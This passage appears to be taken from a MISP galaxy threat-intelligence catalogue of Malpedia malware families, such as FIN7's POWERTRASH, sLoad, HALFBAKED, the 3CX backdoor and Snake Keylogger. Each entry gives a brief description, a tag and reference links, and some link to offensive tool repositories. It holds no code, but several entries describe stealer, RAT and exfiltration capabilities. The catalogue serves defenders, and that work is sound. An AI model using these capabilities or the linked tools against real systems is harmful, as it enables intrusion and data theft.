https://mp.weixin.qq.com/s/NN_iRvwA6yOHFS9Z3A0RBA

https://shells.systems/reviving-leaked-muddyc3-used-by-muddywater-apt/

https://web.archive.org/web/20180807105755/https://www.sekoia.fr/blog/falling-on-muddywater/

https://research.checkpoint.com/2019/the-muddy-waters-of-apt-attacks/

https://www.fireeye.com/blog/threat-research/2018/03/iranian-threat-group-updates-ttps-in-spear-phishing-campaign.html

https://www.secureworks.com/research/threat-profiles/cobalt-ulster

https://www.group-ib.com/blog/muddywater/

https://blog.prevailion.com/2020/01/summer-mirage.html

https://www.clearskysec.com/muddywater-targets-kurdish-groups-turkish-orgs/

https://sec0wn.blogspot.com/2018/05/clearing-muddywater-analysis-of-new.html

https://unit42.paloaltonetworks.com/atoms/boggyserpens/

https://thehackernews.com/2022/02/irans-muddywater-hacker-group-using-new.html

https://www.cisa.gov/uscert/ncas/alerts/aa22-055a

https://www.deepinstinct.com/blog/phonyc2-revealing-a-new-malicious-command-control-framework-by-muddywater

https://blog.malwarebytes.com/threat-analysis/2017/09/elaborate-scripting-fu-used-in-espionage-attack-against-saudi-arabia-government_entity/

https://www.clearskysec.com/wp-content/uploads/2019/06/Clearsky-Iranian-APT-group-%E2%80%98MuddyWater%E2%80%99-Adds-Exploits-to-Their-Arsenal.pdf

https://www.inforisktoday.com/muddywater-targets-critical-infrastructure-in-asia-europe-a-18611

https://reaqta.com/2017/11/muddywater-apt-targeting-middle-east/

https://sec0wn.blogspot.com/2018/03/a-quick-dip-into-muddywaters-recent.html

https://sec0wn.blogspot.com/2017/10/continued-activity-targeting-middle-east.html

https://marcoramilli.com/2020/01/15/iranian-threat-actors-preliminary-analysis/

https://www.cisa.gov/uscert/sites/default/files/publications/AA22-055A_Iranian_Government-Sponsored_Actors_Conduct_Cyber_Operations.pdf

https://securelist.com/apt-trends-report-q2-2019/91897/

https://blog.trendmicro.com/trendlabs-security-intelligence/muddywater-resurfaces-uses-multi-stage-backdoor-powerstats-v3-and-new-post-exploitation-tools/

https://blog.trendmicro.com/trendlabs-security-intelligence/campaign-possibly-connected-muddywater-surfaces-middle-east-central-asia/

https://sec0wn.blogspot.com/2018/02/burping-on-muddywater.html

https://www.clearskysec.com/muddywater-operations-in-lebanon-and-oman/

https://unit42.paloaltonetworks.com/unit42-muddying-the-water-targeted-attacks-in-the-middle-east/

POWERTRASH

This PowerShell malware is an in-memory dropper used by FIN7 to execute an embedded payload. According to Mandiant’s blog article: "POWERTRASH is a uniquely obfuscated iteration of a shellcode invoker included in the PowerSploit framework available on GitHub."

The tag is: misp-galaxy:malpedia="POWERTRASH"

POWERTRASH is also known as:

Table 2737. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powertrash

https://www.mandiant.com/resources/evolution-of-fin7

https://www.mandiant.com/resources/blog/evolution-of-fin7

PowerWare

The tag is: misp-galaxy:malpedia="PowerWare"

PowerWare is also known as:

Table 2738. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powerware

https://blog.cylance.com/ransomware-update-todays-bountiful-cornucopia-of-extortive-threats

PowerZure

PowerZure is a PowerShell project created to assess and exploit resources within Microsoft’s cloud platform, Azure. PowerZure was created out of the need for a framework that can both perform reconnaissance and exploitation of Azure, AzureAD, and the associated resources.

The tag is: misp-galaxy:malpedia="PowerZure"

PowerZure is also known as:

Table 2739. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powerzure

https://github.com/hausec/PowerZure

PresFox

The family adds a fake root certificate authority, sets a proxy.pac URL for local browsers and redirects infected users to fake banking applications (currently targeting Poland). Based on the information shared, the PowerShell script appears to be dropped by an exploit kit.

The tag is: misp-galaxy:malpedia="PresFox"

PresFox is also known as:

Table 2743. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/ps1.presfox

https://twitter.com/kafeine/status/1092000556598677504

RMOT

According to Trellix, this is a first-stage, PowerShell-based malware dropped via Excel/VBS. It is able to establish a foothold and exfiltrate data. Targets identified include hotels in Macao.

The tag is: misp-galaxy:malpedia="RMOT"

RMOT is also known as:

Table 2745. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/ps1.rmot

https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/suspected-darkhotel-apt-activity-update.html

Royal Ransom (Powershell)

Toolkit downloader used by the Royal ransomware group; it relies on GnuPG for decryption.

The tag is: misp-galaxy:malpedia="Royal Ransom (Powershell)"

Royal Ransom (Powershell) is also known as:

Table 2747. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/ps1.royal_ransom

https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-061a

Schtasks

The tag is: misp-galaxy:malpedia="Schtasks"

Schtasks is also known as:

Table 2748. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/ps1.schtasks

https://github.com/re4lity/Schtasks-Backdoor/blob/master/Schtasks-Backdoor.ps1

skyrat

The tag is: misp-galaxy:malpedia="skyrat"

skyrat is also known as:

Table 2749. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/ps1.skyrat

https://github.com/YSCHGroup/SkyRAT

sLoad

sLoad is a PowerShell downloader that most frequently delivers Ramnit banker and includes noteworthy reconnaissance features. The malware gathers information about the infected system including a list of running processes, the presence of Outlook, and the presence of Citrix-related files. sLoad can also take screenshots and check the DNS cache for specific domains (e.g., targeted banks), as well as load external binaries.

The tag is: misp-galaxy:malpedia="sLoad"

sLoad is also known as:

  • Starslord

Table 2750. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/ps1.sload

https://www.microsoft.com/security/blog/2020/01/21/sload-launches-version-2-0-starslord/

https://cert-agid.gov.it/news/campagna-sload-v-2-9-3-veicolata-via-pec/

https://blog.yoroi.company/research/the-sload-powershell-threat-is-expanding-to-italy/

https://cyware.com/news/new-sload-malware-downloader-being-leveraged-by-apt-group-ta554-to-spread-ramnit-7d03f2d9

https://www.proofpoint.com/us/threat-insight/post/sload-and-ramnit-pairing-sustained-campaigns-against-uk-and-italy

https://blog.minerva-labs.com/sload-targeting-europe-again

https://www.bitdefender.com/files/News/CaseStudies/study/377/Bitdefender-Whitepaper-WMI-creat4871-en-EN-GenericUse.pdf

https://www.cert-pa.it/notizie/campagna-sload-star-wars-edition-veicolata-via-pec/

https://www.certego.net/en/news/sload-hits-italy-unveil-the-power-of-powershell-as-a-downloader/

https://threatpost.com/sload-spying-payload-delivery-bits/151120/

https://www.vkremez.com/2018/08/lets-learn-in-depth-into-latest-ramnit.html

https://isc.sans.edu/forums/diary/Malicious+Powershell+Targeting+UK+Bank+Customers/23675/

https://www.cybereason.com/blog/banking-trojan-delivered-by-lolbins-ramnit-trojan

Tater PrivEsc

The tag is: misp-galaxy:malpedia="Tater PrivEsc"

Tater PrivEsc is also known as:

Table 2753. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/ps1.tater

https://github.com/Kevin-Robertson/Tater

ThunderShell

The tag is: misp-galaxy:malpedia="ThunderShell"

ThunderShell is also known as:

Table 2754. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/ps1.thundershell

https://github.com/Mr-Un1k0d3r/ThunderShell

Unidentified PS 001

Recon and exfiltration script, dropped from a LNK file. Attributed to APT-C-12.

The tag is: misp-galaxy:malpedia="Unidentified PS 001"

Unidentified PS 001 is also known as:

Table 2755. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/ps1.unidentified_001

https://bitofhex.com/2020/02/10/sapphire-mushroom-lnk-files/

Unidentified PS 002 (RAT)

A PowerShell-based RAT capable of pulling further payloads, delivered through Russia-themed phishing mails.

The tag is: misp-galaxy:malpedia="Unidentified PS 002 (RAT)"

Unidentified PS 002 (RAT) is also known as:

Table 2756. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/ps1.unidentified_002

https://www.bleepingcomputer.com/news/security/phishing-campaign-targets-russian-govt-dissidents-with-cobalt-strike/

https://blog.malwarebytes.com/threat-intelligence/2022/03/new-spear-phishing-campaign-targets-russian-dissidents/

Unidentified PS 003 (RAT)

This malware is a RAT written in PowerShell. It has the following capabilities: downloading and uploading files, loading and executing a PowerShell script, and executing a specific command. It was observed by the Malwarebytes LABS Threat Intelligence Team in a newly discovered campaign: according to Malwarebytes LABS, this campaign tries to lure Germans with a promise of updates on the current threat situation in Ukraine.

The tag is: misp-galaxy:malpedia="Unidentified PS 003 (RAT)"

Unidentified PS 003 (RAT) is also known as:

Table 2757. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/ps1.unidentified_003

https://blog.malwarebytes.com/threat-intelligence/2022/05/custom-powershell-rat-targets-germans-seeking-information-about-the-ukraine-crisis/

WannaRen Downloader

The tag is: misp-galaxy:malpedia="WannaRen Downloader"

WannaRen Downloader is also known as:

Table 2760. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/ps1.wannaren_loader

https://twitter.com/blackorbird/status/1247834024711577601

WMImplant

The tag is: misp-galaxy:malpedia="WMImplant"

WMImplant is also known as:

Table 2761. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/ps1.wmimplant

https://www.fireeye.com/blog/threat-research/2017/03/wmimplant_a_wmi_ba.html

AndroxGh0st

According to Lacework, this is an SMTP cracker, which is primarily intended to scan for and parse Laravel application secrets from exposed .env files. Note: Laravel is an open source PHP framework and the Laravel .env file is often targeted for its various configuration data including AWS, SendGrid and Twilio. AndroxGh0st has multiple features to enable SMTP abuse including scanning, exploitation of exposed credentials and APIs, and even deployment of webshells. For AWS specifically, the malware scans for and parses AWS keys but also has the ability to generate keys for brute force attacks. However, the brute force capability is likely a novelty and is a statistically unlikely attack vector.

The tag is: misp-galaxy:malpedia="AndroxGh0st"

AndroxGh0st is also known as:

  • Androx

  • AndroxGhost

Table 2762. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/py.androxgh0st

https://www.lacework.com/blog/androxghost-the-python-malware-exploiting-your-aws-keys/

Archivist

The tag is: misp-galaxy:malpedia="Archivist"

Archivist is also known as:

Table 2763. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/py.archivist

https://github.com/NullArray/Archivist

DropboxC2C

The tag is: misp-galaxy:malpedia="DropboxC2C"

DropboxC2C is also known as:

Table 2766. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/py.dropboxc2c

https://github.com/0x09AL/DropboxC2C

Empyrean

Discord stealer written in Python with JavaScript-based inject files.

The tag is: misp-galaxy:malpedia="Empyrean"

Empyrean is also known as:

Table 2767. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/py.empyrean

https://www.cyberark.com/resources/threat-research-blog/the-not-so-secret-war-on-discord

Guard

According to Kaspersky Labs, Guard is a malware developed by threat actor WildPressure. It is written in Python and packaged using PyInstaller, both for Windows and macOS operating systems. Its intrinsics resemble parts of how win.milum operates.

The tag is: misp-galaxy:malpedia="Guard"

Guard is also known as:

Table 2768. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/py.guard

https://securelist.com/wildpressure-targets-macos/103072/

InvisibleFerret

The tag is: misp-galaxy:malpedia="InvisibleFerret"

InvisibleFerret is also known as:

Table 2769. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/py.invisibleferret

https://unit42.paloaltonetworks.com/two-campaigns-by-north-korea-bad-actors-target-job-hunters/

KeyPlexer

The tag is: misp-galaxy:malpedia="KeyPlexer"

KeyPlexer is also known as:

Table 2770. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/py.keyplexer

https://github.com/nairuzabulhul/KeyPlexer

Lofy

The tag is: misp-galaxy:malpedia="Lofy"

Lofy is also known as:

  • LofyLife

Table 2772. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/py.lofy

https://securelist.com/lofylife-malicious-npm-packages/107014/

Loki RAT

This RAT written in Python is an open-source fork of the Ares RAT. This malware integrates additional modules, like recording, lockscreen, and locate options. It was used in a customized version by the El Machete APT in an ongoing campaign since 2020. The original code can be found at: https://github.com/TheGeekHT/Loki.Rat/

The tag is: misp-galaxy:malpedia="Loki RAT"

Loki RAT is also known as:

Table 2773. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/py.lokirat

https://research.checkpoint.com/2022/state-sponsored-attack-groups-capitalise-on-russia-ukraine-war-for-cyber-espionage/

MASEPIE

The tag is: misp-galaxy:malpedia="MASEPIE"

MASEPIE is also known as:

Table 2774. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/py.masepie

https://cert.gov.ua/article/6276894

NetWorm

The tag is: misp-galaxy:malpedia="NetWorm"

NetWorm is also known as:

Table 2776. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/py.networm

https://github.com/pylyf/NetWorm

PIRAT

The tag is: misp-galaxy:malpedia="PIRAT"

PIRAT is also known as:

Table 2777. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/py.pirat

https://vk.com/m228228?w=wall306895781_177

PyAesLoader

The tag is: misp-galaxy:malpedia="PyAesLoader"

PyAesLoader is also known as:

Table 2781. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/py.pyaesloader

PY#RATION

According to Securonix, this malware exhibits remote access trojan (RAT) behavior, allowing for control of and persistence on the affected host. As with other RATs, PY#RATION possesses a whole host of features and capabilities, including data exfiltration and keylogging. What makes this malware particularly unique is its utilization of websockets for both command and control (C2) communication and exfiltration as well as how it evades detection from antivirus and network security measures.

The tag is: misp-galaxy:malpedia="PY#RATION"

PY#RATION is also known as:

Table 2784. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/py.pyration

https://www.securonix.com/blog/security-advisory-python-based-pyration-attack-campaign/

Responder

Responder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication.

The tag is: misp-galaxy:malpedia="Responder"

Responder is also known as:

  • SpiderLabs Responder

Table 2786. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/py.responder

https://yoroi.company/research/shadows-from-the-past-threaten-italian-enterprises/

https://github.com/lgandx/Responder

SpaceCow

The tag is: misp-galaxy:malpedia="SpaceCow"

SpaceCow is also known as:

Table 2789. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/py.spacecow

https://github.com/TheSph1nx/SpaceCow

stealler

The tag is: misp-galaxy:malpedia="stealler"

stealler is also known as:

Table 2790. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/py.stealler

https://habr.com/en/sandbox/135410/

unidentified_002

The tag is: misp-galaxy:malpedia="unidentified_002"

unidentified_002 is also known as:

Table 2792. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/py.unidentified_002

unidentified_003

The tag is: misp-galaxy:malpedia="unidentified_003"

unidentified_003 is also known as:

Table 2793. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/py.unidentified_003

Venomous

Ransomware written in Python and delivered as a compiled executable created with PyInstaller.

The tag is: misp-galaxy:malpedia="Venomous"

Venomous is also known as:

Table 2794. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/py.venomous

https://blog.cyble.com/2021/08/04/a-deep-dive-analysis-of-venomous-ransomware/

Venus Stealer

Venus Stealer is a Python-based infostealer observed in early 2023.

The tag is: misp-galaxy:malpedia="Venus Stealer"

Venus Stealer is also known as:

Table 2795. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/py.venus_stealer

https://twitter.com/0xToxin/status/1625435116771180546

https://geekypandatales.wordpress.com/2023/02/19/the-infostealer-pie-python-malware-analysis/

W4SP Stealer

The tag is: misp-galaxy:malpedia="W4SP Stealer"

W4SP Stealer is also known as:

Table 2796. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/py.w4sp_stealer

https://securelist.com/two-more-malicious-python-packages-in-the-pypi/107218/

KV

The tag is: misp-galaxy:malpedia="KV"

KV is also known as:

Table 2797. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/sh.kv

https://blog.lumen.com/routers-roasting-on-an-open-firewall-the-kv-botnet-investigation/

FlexiSpy (symbian)

The tag is: misp-galaxy:malpedia="FlexiSpy (symbian)"

FlexiSpy (symbian) is also known as:

Table 2798. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/symbian.flexispy

https://www.randhome.io/blog/2017/04/23/lets-talk-about-flexispy/

CageyChameleon

CageyChameleon is a VBS-based backdoor which has the capability to enumerate the list of running processes and check for the presence of several antivirus products. CageyChameleon collects user host information, current process information, etc. The collected information is sent back to the C2 server, and the backdoor continues to issue requests in order to perform subsequent operations.

The tag is: misp-galaxy:malpedia="CageyChameleon"

CageyChameleon is also known as:

  • Cabbage RAT

Table 2799. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/vbs.cageychameleon

https://threatbook.cn/ppt/The%2520Nightmare%2520of%2520Global%2520Cryptocurrency%2520Companies%2520-%2520Demystifying%2520the%2520%25E2%2580%259CDangerousPassword%25E2%2580%259D%2520of%2520the%2520APT%2520Organization.pdf

https://atlas-cybersecurity.com/cyber-threats/cryptocore-cryptocurrency-exchanges-under-attack/

https://www.clearskysec.com/cryptocore-group/

https://www.clearskysec.com/wp-content/uploads/2021/05/CryptoCore-Lazarus-Clearsky.pdf

https://i.blackhat.com/USA-22/Thursday/US-22-Wikoff-Talent-Need-Not-Apply.pdf

https://sansorg.egnyte.com/dl/3P3HxFiNgL

https://securelist.com/the-bluenoroff-cryptocurrency-hunt-is-still-on/105488/

https://www.proofpoint.com/us/blog/threat-insight/ta444-apt-startup-aimed-at-your-funds

https://www.proofpoint.com/us/daily-ruleset-update-summary-20190314

https://vb2020.vblocalhost.com/conference/presentations/unveiling-the-cryptomimic/

https://mp.weixin.qq.com/s/nnLqUBPX8xZ3hCr5u-iSjQ

https://blogs.jpcert.or.jp/ja/2023/05/dangerouspassword.html

https://cyberstruggle.org/delta/LeeryTurtleThreatReport_05_20.pdf

https://www.clearskysec.com/wp-content/uploads/2020/06/CryptoCore_Group.pdf

https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/offshore%20APT%20organization/DangerousPassword/2020-04-02/Analysis.md

https://blogs.jpcert.or.jp/en/2019/07/spear-phishing-against-cryptocurrency-businesses.html

GGLdr

The tag is: misp-galaxy:malpedia="GGLdr"

GGLdr is also known as:

Table 2801. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/vbs.ggldr

https://www.forcepoint.com/blog/x-labs/carbanak-group-uses-google-malware-command-and-control

GlowSpark

The tag is: misp-galaxy:malpedia="GlowSpark"

GlowSpark is also known as:

Table 2802. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/vbs.glowspark

https://inquest.net/blog/2022/02/10/380-glowspark

HALFBAKED

The HALFBAKED malware family consists of multiple components designed to establish and maintain a foothold in victim networks, with the ultimate goal of gaining access to sensitive financial information. HALFBAKED listens for the following commands from the C2 server:

info: Sends victim machine information (OS, processor, BIOS and running processes) gathered using WMI queries
processList: Sends the list of running processes
screenshot: Takes a screenshot of the victim machine (using 58d2a83f777688.78384945.ps1)
runvbs: Executes a VB script
runexe: Executes an EXE file
runps1: Executes a PowerShell script
delete: Deletes the specified file
update: Updates the specified file

The tag is: misp-galaxy:malpedia="HALFBAKED"

HALFBAKED is also known as:

Table 2804. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/vbs.halfbaked

https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html

https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf

https://attack.mitre.org/software/S0151/

Iloveyou

The tag is: misp-galaxy:malpedia="Iloveyou"

Iloveyou is also known as:

  • Love Bug

  • LoveLetter

Table 2805. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/vbs.iloveyou

https://resources.sei.cmu.edu/library/asset-view.cfm?assetID=496186

Janicab (VBScript)

The tag is: misp-galaxy:malpedia="Janicab (VBScript)"

Janicab (VBScript) is also known as:

Table 2806. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/vbs.janicab

https://securelist.com/deathstalker-targets-legal-entities-with-new-janicab-variant/108131/

lampion

The malware is delivered by emails containing links to ZIP files or ZIP attachments. The ZIP contains a VBScript that, when executed, downloads additional files from AWS S3, Google Drive or other cloud hosting services. The downloaded files are encrypted .exe and .dll files. The malware targets banking clients in Portugal.

The tag is: misp-galaxy:malpedia="lampion"

lampion is also known as:

Table 2807. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/vbs.lampion

https://seguranca-informatica.pt/lampion-trojan-disseminated-in-portugal-using-covid-19-template/

https://unit42.paloaltonetworks.com/single-bit-trap-flag-intel-cpu/

https://research.checkpoint.com/wp-content/uploads/2019/12/Threat_Intelligence_News_2019-12-30.pdf

https://www.layer8.pt/PDFs/New%20Lampion%20banking%20Trojan%20variant%20in%20the%20wild.pdf

https://cofense.com/blog/lampion-trojan-utilizes-new-delivery-through-cloud-based-sharing

https://seguranca-informatica.pt/new-release-of-lampion-trojan-spreads-in-portugal-with-some-improvements-on-the-vbs-downloader

https://seguranca-informatica.pt/trojan-lampion-is-back-after-3-months/

https://seguranca-informatica.pt/targeting-portugal-a-new-trojan-lampion-has-spread-using-template-emails-from-the-portuguese-government-finance-tax/

https://securityaffairs.co/wordpress/128975/malware/hidden-c2-lampion-trojan-release-212.html

https://seguranca-informatica.pt/the-hidden-c2-lampion-trojan-release-212-is-on-the-rise-and-using-a-c2-server-for-two-years

LitterDrifter

The tag is: misp-galaxy:malpedia="LitterDrifter"

LitterDrifter is also known as:

Table 2808. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/vbs.litterdrifter

https://research.checkpoint.com/2023/malware-spotlight-into-the-trash-analyzing-litterdrifter/

MOUSEISLAND

MOUSEISLAND is a Microsoft Word macro downloader used as the first infection stage and is delivered inside a password-protected zip attached to a phishing email. Based on FireEye intrusion data from responding to ICEDID related incidents, the secondary payload delivered by MOUSEISLAND has been PHOTOLOADER, which acts as an intermediary downloader to install ICEDID.

The tag is: misp-galaxy:malpedia="MOUSEISLAND"

MOUSEISLAND is also known as:

Table 2810. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/vbs.mouseisland

https://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html

NodeJS Ransomware

Downloads NodeJS when deployed.

The tag is: misp-galaxy:malpedia="NodeJS Ransomware"

NodeJS Ransomware is also known as:

Table 2811. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/vbs.nodejs_ransom

https://dissectingmalwa.re/the-opposite-of-fileless-malware-nodejs-ransomware.html

RandomQuery

According to SentinelLabs, this is a VisualBasic-based malware that gathers system and file information and exfiltrates the data using InternetExplorer.Application or Microsoft.XMLHTTP objects.

The tag is: misp-galaxy:malpedia="RandomQuery"

RandomQuery is also known as:

Table 2812. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/vbs.randomquery

https://www.sentinelone.com/labs/kimsuky-ongoing-campaign-using-tailored-reconnaissance-toolkit/

Starfighter (VBScript)

According to the author, this is a JavaScript-based Empire launcher that runs with its own embedded PowerShell host so as not to depend on local PowerShell availability.

The tag is: misp-galaxy:malpedia="Starfighter (VBScript)"

Starfighter (VBScript) is also known as:

Table 2813. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/vbs.starfighter

https://github.com/Cn33liz/StarFighters

Unidentified VBS 001

The tag is: misp-galaxy:malpedia="Unidentified VBS 001"

Unidentified VBS 001 is also known as:

Table 2815. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/vbs.unidentified_001

https://twitter.com/JohnLaTwC/status/1118278148993339392

Unidentified 002 (Operation Kremlin)

Unnamed malware. Delivered as a remote template that drops a VBS file, which uses LOLBins to crawl the disk and exfiltrate data zipped up via WinRAR.

The tag is: misp-galaxy:malpedia="Unidentified 002 (Operation Kremlin)"

Unidentified 002 (Operation Kremlin) is also known as:

Table 2816. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/vbs.unidentified_002

https://www.clearskysec.com/operation-kremlin/

Unidentified VBS 004 (RAT)

Lab52 describes this as a light first-stage RAT used by MuddyWater, with samples observed between at least November 2020 and January 2022.

The tag is: misp-galaxy:malpedia="Unidentified VBS 004 (RAT)"

Unidentified VBS 004 (RAT) is also known as:

Table 2818. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/vbs.unidentified_004

https://lab52.io/blog/muddywaters-light-first-stager-targetting-middle-east/

VBREVSHELL

According to Mandiant, VBREVSHELL is a VBA macro that spawns a reverse shell relying exclusively on Windows API calls.

The tag is: misp-galaxy:malpedia="VBREVSHELL"

VBREVSHELL is also known as:

Table 2821. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/vbs.vbrevshell

https://www.mandiant.com/media/17826

https://www.linkedin.com/feed/update/urn:li:activity:7137086303329783808/

https://socradar.io/dark-web-profile-apt42-iranian-cyber-espionage-group/

000Stealer

The tag is: misp-galaxy:malpedia="000Stealer"

000Stealer is also known as:

Table 2824. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.000stealer

https://twitter.com/3xp0rtblog/status/1509978637189419008

3CX Backdoor (Windows)

According to CrowdStrike, this backdoor was discovered being embedded in a legitimate, signed version of 3CXDesktopApp, and thus constitutes a supply chain attack.

The tag is: misp-galaxy:malpedia="3CX Backdoor (Windows)"

3CX Backdoor (Windows) is also known as:

  • SUDDENICON

Table 2825. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.3cx_backdoor

https://www.sentinelone.com/blog/smoothoperator-ongoing-campaign-trojanizes-3cx-software-in-software-supply-chain-attack/

https://blog.cyble.com/2023/03/31/a-comprehensive-analysis-of-the-3cx-attack

https://www.virusbulletin.com/uploads/pdf/conference/vb2023/papers/Lazarus-campaigns-and-backdoors-in-2022-2023.pdf

https://www.welivesecurity.com/2023/04/20/linux-malware-strengthens-links-lazarus-3cx-supply-chain-attack

https://www.crowdstrike.com/blog/crowdstrike-detects-and-prevents-active-intrusion-campaign-targeting-3cxdesktopapp-customers/

https://www.rapid7.com/blog/post/2023/03/30/backdoored-3cxdesktopapp-installer-used-in-active-threat-campaign/

https://www.volexity.com/blog/2023/03/30/3cx-supply-chain-compromise-leads-to-iconic-incident/

https://securelist.com/it-threat-evolution-q2-2023/110355/

https://www.fortinet.com/blog/threat-research/3cx-desktop-app-compromised

https://www.elastic.co/security-labs/elastic-users-protected-from-suddenicon-supply-chain-attack

https://www.cadosecurity.com/forensic-triage-of-a-windows-system-running-the-backdoored-3cx-desktop-app/

https://www.trendmicro.com/en_us/research/23/c/information-on-attacks-involving-3cx-desktop-app.html

https://www.reddit.com/r/crowdstrike/comments/125r3uu/20230329_situational_awareness_crowdstrike/

https://blogs.vmware.com/security/2023/03/investigating-3cx-desktop-application-attacks-what-you-need-to-know.html

https://github.com/dodo-sec/Malware-Analysis/blob/main/SmoothOperator/SmoothOperator.md

https://www.group-ib.com/blog/3cx-supply-chain-attack/?utm_source=twitter&utm_campaign=3cx-blog&utm_medium=social

https://blogs.blackberry.com/en/2023/03/initial-implants-and-network-analysis-suggest-the-3cx-supply-chain-operation-goes-back-to-fall-2022

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/3cx-supply-chain-attack

https://www.youtube.com/watch?v=fTX-vgSEfjk

https://www.zscaler.com/security-research/3CX-supply-chain-attack-analysis-march-2023

https://www.huntress.com/blog/3cx-voip-software-compromise-supply-chain-threats

https://www.splunk.com/en_us/blog/security/splunk-insights-investigating-the-3cxdesktopapp-supply-chain-compromise.html

https://www.reversinglabs.com/blog/red-flags-fly-over-supply-chain-compromised-3cx-update

https://research.openanalysis.net/3cx/northkorea/apt/triage/2023/03/30/3cx-malware.html#Functionality

404 Keylogger

Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim’s sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.

The tag is: misp-galaxy:malpedia="404 Keylogger"

404 Keylogger is also known as:

  • 404KeyLogger

  • Snake Keylogger

Table 2826. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

https://threatresearch.ext.hp.com/pdf-malware-is-not-yet-dead/

https://blogs.blackberry.com/en/2022/06/threat-thursday-unique-delivery-method-for-snake-keylogger

https://any.run/cybersecurity-blog/analyzing-snake-keylogger/

https://cert.gov.ua/article/955924

https://habr.com/ru/company/group-ib/blog/477198/

https://www.ciphertechsolutions.com/roboski-global-recovery-automation/

https://x-junior.github.io/malware%20analysis/2022/06/24/Snakekeylogger.html

https://insights.infoblox.com/threat-intelligence-reports/threat-intelligence--102

https://twitter.com/James_inthe_box/status/1401921257109561353

https://www.fortinet.com/blog/threat-research/deep-dive-into-a-fresh-variant-of-snake-keylogger-malware

https://securityintelligence.com/posts/roboski-global-recovery-automation/

https://malwarebookreports.com/cross-platform-java-dropper-snake-and-xloader-mac-version/

https://www.malwarebytes.com/blog/threat-intelligence/2022/20221121-threat-intel-report-final.pdf

https://www.cybereason.com/blog/threat-analysis-report-snake-infostealer-malware

https://www.youtube.com/watch?v=vzyJp2w8bPE

https://insights.infoblox.com/threat-intelligence-reports/threat-intelligence--89

https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord

https://www.bleepingcomputer.com/news/security/pdf-smuggles-microsoft-word-doc-to-drop-snake-keylogger-malware/

https://threatresearch.ext.hp.com/the-many-skins-of-snake-keylogger/

https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/

